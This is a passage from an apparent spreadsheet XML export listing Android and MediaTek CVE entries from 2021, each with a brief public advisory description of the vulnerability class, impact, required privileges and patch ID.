    <t>In tun_get_user of tun.c, there is possible memory corruption due to a use after free. This could lead to local escalation of privilege with System execution privileges required. User interaction is not required for exploitation. Product: Android; Versions: Android kernel; Android ID: A-146554327.</t>
  </si>
  <si>
    <t>CVE-2021-0343</t>
  </si>
  <si>
    <t>In kisd, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11; Patch ID: ALPS05449962.</t>
  </si>
  <si>
    <t>CVE-2021-0344</t>
  </si>
  <si>
    <t>In mtkpower, there is a possible memory corruption due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11; Patch ID: ALPS05437558.</t>
  </si>
  <si>
    <t>CVE-2021-0345</t>
  </si>
  <si>
    <t>In mobile_log_d, there is a possible escalation of privilege due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11; Patch ID: ALPS05432974.</t>
  </si>
  <si>
    <t>CVE-2021-0346</t>
  </si>
  <si>
    <t>In vpu, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11; Patch ID: ALPS05371580.</t>
  </si>
  <si>
    <t>CVE-2021-0347</t>
  </si>
  <si>
    <t>In ccu, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11; Patch ID: ALPS05377188.</t>
  </si>
  <si>
    <t>CVE-2021-0348</t>
  </si>
  <si>
    <t>In vpu, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-9, Android-10, Android-11; Patch ID: ALPS05349201.</t>
  </si>
  <si>
    <t>CVE-2021-0349</t>
  </si>
  <si>
    <t>In display driver, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-9, Android-10, Android-11; Patch ID: ALPS05362646.</t>
  </si>
  <si>
    <t>CVE-2021-0350</t>
  </si>
  <si>
    <t>In ged, there is a possible system crash due to an improper input validation. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11; Patch ID: ALPS05342338.</t>
  </si>
  <si>
    <t>CVE-2021-0351</t>
  </si>
  <si>
    <t>In wlan driver, there is a possible system crash due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11; Patch ID: ALPS05412917.</t>
  </si>
  <si>
    <t>CVE-2021-0352</t>
  </si>
  <si>
    <t>In RT regmap driver, there is a possible memory corruption due to type confusion. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11; Patch ID: ALPS05453809.</t>
  </si>
  <si>
    <t>CVE-2021-0353</t>
  </si>
  <si>
    <t>In kisd, there is a possible memory corruption due to a heap buffer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11; Patch ID: ALPS05425247.</t>
  </si>
  <si>
    <t>CVE-2021-0354</t>
  </si>
  <si>
    <t>In ged, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11; Patch ID: ALPS05431161.</t>
  </si>
  <si>
    <t>CVE-2021-0355</t>
  </si>
  <si>
    <t>In kisd, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11; Patch ID: ALPS05425581.</t>
  </si>
  <si>
    <t>CVE-2021-0356</t>
  </si>
  <si>
    <t>In netdiag, there is a possible command injection due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11; Patch ID: ALPS05442014.</t>
  </si>
  <si>
    <t>CVE-2021-0357</t>
  </si>
  <si>
    <t>In netdiag, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11; Patch ID: ALPS05442002.</t>
  </si>
  <si>
    <t>CVE-2021-0358</t>
  </si>
  <si>
    <t>In netdiag, there is a possible command injection due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11; Patch ID: ALPS05442022.</t>
  </si>
  <si>
    <t>CVE-2021-0359</t>
  </si>
  <si>
    <t>In netdiag, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11; Patch ID: ALPS05442011.</t>
  </si>
  <si>
    <t>CVE-2021-0360</t>
  </si>
  <si>
    <t>In netdiag, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11; Patch ID: ALPS05442006.</t>
  </si>
  <si>
    <t>CVE-2021-0361</t>
  </si>
  <si>
    <t>In kisd, there is a possible out of bounds read due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11; Patch ID: ALPS05449968.</t>
  </si>
  <si>
    <t>CVE-2021-0362</t>
  </si>
  <si>
    <t>In aee, there is a possible memory corruption due to a stack buffer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11; Patch ID: ALPS05457070.</t>
  </si>
  <si>
    <t>CVE-2021-0363</t>
  </si>
  <si>
    <t>In mobile_log_d, there is a possible command injection due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11; Patch ID: ALPS05458478.</t>
  </si>
  <si>
    <t>CVE-2021-0364</t>
  </si>
  <si>
    <t>In mobile_log_d, there is a possible command injection due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11; Patch ID: ALPS05458478; Issue ID: ALPS05458503.</t>
  </si>
  <si>
    <t>CVE-2021-0365</t>
  </si>
  <si>
    <t>In display driver, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11; Patch ID: ALPS05454782.</t>
  </si>
  <si>
    <t>CVE-2021-0366</t>
  </si>
  <si>
    <t>In vpu, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11; Patch ID: ALPS05371580; Issue ID: ALPS05379093.</t>
  </si>
  <si>
    <t>CVE-2021-0367</t>
  </si>
  <si>
    <t>In vpu, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11; Patch ID: ALPS05371580; Issue ID: ALPS05379085.</t>
  </si>
  <si>
    <t>CVE-2021-0368</t>
  </si>
  <si>
    <t>In oggpack_look of bitwise.c, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-169829774</t>
  </si>
  <si>
    <t>CVE-2021-0369</t>
  </si>
  <si>
    <t>In CrossProfileAppsServiceImpl.java, there is the possibility of an application's INTERACT_ACROSS_PROFILES grant state not displaying properly in the setting UI due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-166561076</t>
  </si>
  <si>
    <t>CVE-2021-0370</t>
  </si>
  <si>
    <t>In Write of NxpMfcReader.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege in the NFC server with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-169259605</t>
  </si>
  <si>
    <t>CVE-2021-0371</t>
  </si>
  <si>
    <t>In nci_proc_rf_management_ntf of nci_hrcv.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-164440989</t>
  </si>
  <si>
    <t>CVE-2021-0372</t>
  </si>
  <si>
    <t>In getMediaOutputSliceAction of RemoteMediaSlice.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-174047735</t>
  </si>
  <si>
    <t>CVE-2021-0374</t>
  </si>
  <si>
    <t>In BnAudioPolicyService::onTransact of IAudioPolicyService.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-169572641</t>
  </si>
  <si>
    <t>CVE-2021-0375</t>
  </si>
  <si>
    <t>In onPackageModified of VoiceInteractionManagerService.java, there is a possible change of default applications due to an insecure default value. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-167261484</t>
  </si>
  <si>
    <t>CVE-2021-0376</t>
  </si>
  <si>
    <t>In checkUriPermission and related functions of MediaProvider.java, there is a possible way to access external files due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-115619667</t>
  </si>
  <si>
    <t>CVE-2021-0377</t>
  </si>
  <si>
    <t>In DeltaPerformer::Write of delta_performer.cc, there is a possible use of untrusted input due to improper input validation. This could lead to a local bypass of defense in depth protections with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-160800689</t>
  </si>
  <si>
    <t>CVE-2021-0378</t>
  </si>
  <si>
    <t>In getNbits of pvmp3_getbits.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-154076193</t>
  </si>
  <si>
    <t>CVE-2021-0379</t>
  </si>
  <si>
    <t>In getUpTo17bits of pvmp3_getbits.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-154075955</t>
  </si>
  <si>
    <t>CVE-2021-0380</t>
  </si>
  <si>
    <t>In onReceive of DcTracker.java, there is a possible way to trigger a provisioning URL and modify other telephony settings due to a missing permission check. This could lead to local escalation of privilege during the onboarding flow with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-172459128</t>
  </si>
  <si>
    <t>CVE-2021-0381</t>
  </si>
  <si>
    <t>In updateNotifications of DeviceStorageMonitorService.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-153466381</t>
  </si>
  <si>
    <t>CVE-2021-0382</t>
  </si>
  <si>
    <t>In checkSlicePermission of SliceManagerService.java, there is a possible resource exposure due to an incorrect permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-140727941</t>
  </si>
  <si>
    <t>CVE-2021-0383</t>
  </si>
  <si>
    <t>In done of CaptivePortalLoginActivity.java, there is a confused deputy. This could lead to local escalation of privilege in carrier settings with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-160871056</t>
  </si>
  <si>
    <t>CVE-2021-0385</t>
  </si>
  <si>
    <t>In createConnectToAvailableNetworkNotification of ConnectToNetworkNotificationBuilder.java, there is a possible connection to untrusted WiFi networks due to notification interaction above the lockscreen. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-172584372</t>
  </si>
  <si>
    <t>CVE-2021-0386</t>
  </si>
  <si>
    <t>In onCreate of UsbConfirmActivity, there is a possible tapjacking vector due to an insecure default value. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-173421110</t>
  </si>
  <si>
    <t>CVE-2021-0387</t>
  </si>
  <si>
    <t>In FindQuotaDeviceForUuid of QuotaUtils.cpp, there is a possible use-after-free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-169421939</t>
  </si>
  <si>
    <t>CVE-2021-0388</t>
  </si>
  <si>
    <t>In onReceive of ImsPhoneCallTracker.java, there is a possible misattribution of data usage due to an incorrect broadcast handler. This could lead to local escalation of privilege resulting in attributing video call data to the wrong app, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-162741489</t>
  </si>
  <si>
    <t>CVE-2021-0389</t>
  </si>
  <si>
    <t>In setNightModeActivated of UiModeManagerService.java, there is a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-168039904</t>
  </si>
  <si>
    <t>CVE-2021-0390</t>
  </si>
  <si>
    <t>In various methods of WifiNetworkSuggestionsManager.java, there is a possible modification of suggested networks due to a missing permission check. This could lead to local escalation of privilege by a background user on the same device with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-174749461</t>
  </si>
  <si>
    <t>CVE-2021-0391</t>
  </si>
  <si>
    <t>In onCreate() of ChooseTypeAndAccountActivity.java, there is a possible way to learn the existence of an account, without permissions, due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-172841550</t>
  </si>
  <si>
    <t>CVE-2021-0392</t>
  </si>
  <si>
    <t>In main of main.cpp, there is a possible memory corruption due to a double free. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-9Android ID: A-175124730</t>
  </si>
  <si>
    <t>CVE-2021-0393</t>
  </si>
  <si>
    <t>In Scanner::LiteralBuffer::NewCapacity of scanner.cc, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution if an attacker can supply a malicious PAC file, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-168041375</t>
  </si>
  <si>
    <t>CVE-2021-0394</t>
  </si>
  <si>
    <t>In android_os_Parcel_readString8 of android_os_Parcel.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-172655291</t>
  </si>
  <si>
    <t>CVE-2021-0395</t>
  </si>
  <si>
    <t>In StopServicesAndLogViolations of reboot.cpp, there is possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-170315126</t>
  </si>
  <si>
    <t>CVE-2021-0396</t>
  </si>
  <si>
    <t>In Builtins::Generate_ArgumentsAdaptorTrampoline of builtins-arm.cc and related files, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote code execution in an unprivileged process with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-160610106</t>
  </si>
  <si>
    <t>CVE-2021-0397</t>
  </si>
  <si>
    <t>In sdp_copy_raw_data of sdp_discovery.cc, there is a possible system compromise due to a double free. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-174052148</t>
  </si>
  <si>
    <t>CVE-2021-0398</t>
  </si>
  <si>
    <t>In bindServiceLocked of ActiveServices.java, there is a possible foreground service launch due to a confused deputy. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-173516292</t>
  </si>
  <si>
    <t>CVE-2021-0399</t>
  </si>
  <si>
    <t>In qtaguid_untag of xt_qtaguid.c, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-176919394References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-0400</t>
  </si>
  <si>
    <t>In injectBestLocation and handleUpdateLocation of GnssLocationProvider.java, there is a possible incorrect reporting of location data to emergency services due to improper input validation. This could lead to incorrect reporting of location data to emergency services with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11Android ID: A-177561690</t>
  </si>
  <si>
    <t>CVE-2021-0401</t>
  </si>
  <si>
    <t>In vow, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-10, Android-11; Patch ID: ALPS05418265.</t>
  </si>
  <si>
    <t>CVE-2021-0402</t>
  </si>
  <si>
    <t>In jpeg, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11; Patch ID: ALPS05433311.</t>
  </si>
  <si>
    <t>CVE-2021-0403</t>
  </si>
  <si>
    <t>In netdiag, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11; Patch ID: ALPS05475124.</t>
  </si>
  <si>
    <t>CVE-2021-0404</t>
  </si>
  <si>
    <t>In mobile_log_d, there is a possible information disclosure due to improper input validation. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11; Patch ID: ALPS05457039.</t>
  </si>
  <si>
    <t>CVE-2021-0405</t>
  </si>
  <si>
    <t>In performance driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11; Patch ID: ALPS05466547.</t>
  </si>
  <si>
    <t>CVE-2021-0406</t>
  </si>
  <si>
    <t>In cameraisp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11; Patch ID: ALPS05471418.</t>
  </si>
  <si>
    <t>CVE-2021-0407</t>
  </si>
  <si>
    <t>In clk driver, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05479659; Issue ID: ALPS05479659.</t>
  </si>
  <si>
    <t>CVE-2021-0408</t>
  </si>
  <si>
    <t>In asf extractor, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05489195; Issue ID: ALPS05489220.</t>
  </si>
  <si>
    <t>CVE-2021-0409</t>
  </si>
  <si>
    <t>In flv extractor, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05561359; Issue ID: ALPS05561359.</t>
  </si>
  <si>
    <t>CVE-2021-0410</t>
  </si>
  <si>
    <t>In flv extractor, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05561360; Issue ID: ALPS05561360.</t>
  </si>
  <si>
    <t>CVE-2021-0411</t>
  </si>
  <si>
    <t>In flv extractor, there is a possible out of bounds read due to an integer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05561362; Issue ID: ALPS05561362.</t>
  </si>
  <si>
    <t>CVE-2021-0412</t>
  </si>
  <si>
    <t>In flv extractor, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05561366; Issue ID: ALPS05561366.</t>
  </si>
  <si>
    <t>CVE-2021-0413</t>
  </si>
  <si>
    <t>In flv extractor, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05561379; Issue ID: ALPS05561379.</t>
  </si>
  <si>
    <t>CVE-2021-0414</t>
  </si>
  <si>
    <t>In flv extractor, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05561384; Issue ID: ALPS05561384.</t>
  </si>
  <si>
    <t>CVE-2021-0415</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05403499; Issue ID: ALPS05336692.</t>
  </si>
  <si>
    <t>CVE-2021-0416</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible system crash due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05403499; Issue ID: ALPS05336700.</t>
  </si>
  <si>
    <t>CVE-2021-0417</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible system crash due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05403499; Issue ID: ALPS05336702.</t>
  </si>
  <si>
    <t>CVE-2021-0418</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible system crash due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05403499; Issue ID: ALPS05336706.</t>
  </si>
  <si>
    <t>CVE-2021-0419</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible system crash due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05403499; Issue ID: ALPS05336713.</t>
  </si>
  <si>
    <t>CVE-2021-0420</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible system crash due to a missing bounds check. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05403499; Issue ID: ALPS05381065.</t>
  </si>
  <si>
    <t>CVE-2021-0421</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible information disclosure due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05403499; Issue ID: ALPS05381235.</t>
  </si>
  <si>
    <t>CVE-2021-0422</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible system crash due to a missing bounds check. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05403499; Issue ID: ALPS05381071.</t>
  </si>
  <si>
    <t>CVE-2021-0423</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible information disclosure due to uninitialized data. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05403499; Issue ID: ALPS05385714.</t>
  </si>
  <si>
    <t>CVE-2021-0424</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible system crash due to a missing bounds check. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05403499; Issue ID: ALPS05393787.</t>
  </si>
  <si>
    <t>CVE-2021-0425</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05403499; Issue ID: ALPS05400059.</t>
  </si>
  <si>
    <t>CVE-2021-0426</t>
  </si>
  <si>
    <t>In parsePrimaryFieldFirstUidAnnotation of LogEvent.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-174485572</t>
  </si>
  <si>
    <t>CVE-2021-0427</t>
  </si>
  <si>
    <t>In parseExclusiveStateAnnotation of LogEvent.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-174488848</t>
  </si>
  <si>
    <t>CVE-2021-0428</t>
  </si>
  <si>
    <t>In getSimSerialNumber of TelephonyManager.java, there is a possible way to read a trackable identifier due to a missing permission check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-173421434</t>
  </si>
  <si>
    <t>CVE-2021-0429</t>
  </si>
  <si>
    <t>In pollOnce of ALooper.cpp, there is possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-175074139</t>
  </si>
  <si>
    <t>CVE-2021-0430</t>
  </si>
  <si>
    <t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution via a malicious NFC packet with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11Android ID: A-178725766</t>
  </si>
  <si>
    <t>CVE-2021-0431</t>
  </si>
  <si>
    <t>In avrc_msg_cback of avrc_api.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure to a paired device with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-174149901</t>
  </si>
  <si>
    <t>CVE-2021-0432</t>
  </si>
  <si>
    <t>In ClearPullerCacheIfNecessary and ForceClearPullerCache of StatsPullerManager.cpp, there is a possible use-after-free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-173552790</t>
  </si>
  <si>
    <t>CVE-2021-0433</t>
  </si>
  <si>
    <t>In onCreate of DeviceChooserActivity.java, there is a possible way to bypass user consent when pairing a Bluetooth device due to a tapjacking/overlay attack. This could lead to local escalation of privilege and pairing malicious devices with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-171221090</t>
  </si>
  <si>
    <t>CVE-2021-0434</t>
  </si>
  <si>
    <t>In onReceive of BluetoothPermissionRequest.java, there is a possible phishing attack allowing a malicious Bluetooth device to acquire permissions based on insufficient information presented to the user in the consent dialog. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-9Android ID: A-167403112</t>
  </si>
  <si>
    <t>CVE-2021-0435</t>
  </si>
  <si>
    <t>In avrc_proc_vendor_command of avrc_api.cc, there is a possible leak of heap data due to uninitialized data. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-174150451</t>
  </si>
  <si>
    <t>CVE-2021-0436</t>
  </si>
  <si>
    <t>In CryptoPlugin::decrypt of CryptoPlugin.cpp, there is a possible out of bounds read due to integer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-176496160</t>
  </si>
  <si>
    <t>CVE-2021-0437</t>
  </si>
  <si>
    <t>In setPlayPolicy of DrmPlugin.cpp, there is a possible double free. This could lead to local escalation of privilege in a privileged process with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-176168330</t>
  </si>
  <si>
    <t>CVE-2021-0438</t>
  </si>
  <si>
    <t>In several functions of InputDispatcher.cpp, WindowManagerService.java, and related files, there is a possible tapjacking attack due to an incorrect FLAG_OBSCURED value. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10Android ID: A-152064592</t>
  </si>
  <si>
    <t>CVE-2021-0439</t>
  </si>
  <si>
    <t>In setPowerModeWithHandle of com_android_server_power_PowerManagerService.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-174243830</t>
  </si>
  <si>
    <t>CVE-2021-0441</t>
  </si>
  <si>
    <t>In onCreate of PermissionActivity.java, there is a possible permission bypass due to Confusing UI. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-174495520</t>
  </si>
  <si>
    <t>CVE-2021-0442</t>
  </si>
  <si>
    <t>In updateInfo of android_hardware_input_InputApplicationHandle.cpp, there is a possible control of code flow due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-174768985</t>
  </si>
  <si>
    <t>CVE-2021-0443</t>
  </si>
  <si>
    <t>In several functions of ScreenshotHelper.java and related files, there is a possible incorrectly saved screenshot due to a race condition. This could lead to local information disclosure across user profiles with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-170474245</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N</t>
  </si>
  <si>
    <t>CVE-2021-0444</t>
  </si>
  <si>
